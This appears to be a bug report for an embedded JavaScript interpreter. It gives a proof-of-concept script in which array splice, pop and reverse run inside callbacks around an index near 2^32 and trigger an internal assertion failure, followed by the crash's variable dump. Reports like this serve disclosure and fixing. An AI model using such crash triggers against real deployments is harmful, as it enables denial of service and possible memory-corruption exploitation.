Description
Reproduce:
make Debug=1
POC:
function test0() {
var c = 4294967295;
var ary = Array();
var func2 = function () {
ary.pop();
ary.pop();
return 4;
};
function func3() {
--c
ary.reverse();
return func2()+ 1;
}
ary[c] = 1;
ary.splice(0, 0, func2(), func3());
ary.push(2);
ary[c] = 0;
ary.splice(1, 0, func2(), func3());
ary.push(3);
}
test0();
Details:
ASSERT(jsvIsInt(v)) FAILED AT src/jsvar.c:2035
#1[r3,l2] Object {
#2[r1,l2] Name String [1 blocks] "\xFF" #3[r1,l1] Object {
#6[r1,l2] Name String [1 blocks] "timers" #7[r2,l0] Array(0) [ ]
#8[r1,l2] Name String [1 blocks] "watches" #9[r2,l0] Array(0) [ ]
}
#11[r1,l2] Name String [1 blocks] "quit" #10[r1,l0] NativeFunction 0x1a99f100 (0) { }
#51[r1,l3] Name String [1 blocks] "test0" #52[r1,l1] Function {
#53[r1,l2] Name String [1 blocks] "\xFFcod" #56[r1,l2] FlatString [14 blocks] "var c = 4294967295;\r\n var ary = Array();\r\n var func2 = function () {\r\n ary.pop();\r\n ary.pop();\r\n return 4;\r\n };\r\n\r\n function func3() {\r\n --c\r\n ary.reverse();\r\n return func2()+ 1;\r\n }\r\n\r\n ary[c] = 1;\r\n ary.splice(0, 0, func2(), func3());\r\n ary.push(2);\r\n ary[c] = 0;\r\n ary.splice(1, 0, func2(), func3());\r\n ary.push(3);"
}
#76[r1,l2] Name String [1 blocks] "Array" #75[r1,l0] NativeFunction 0x1a9a2cd1 (17) { }
}
EXITING.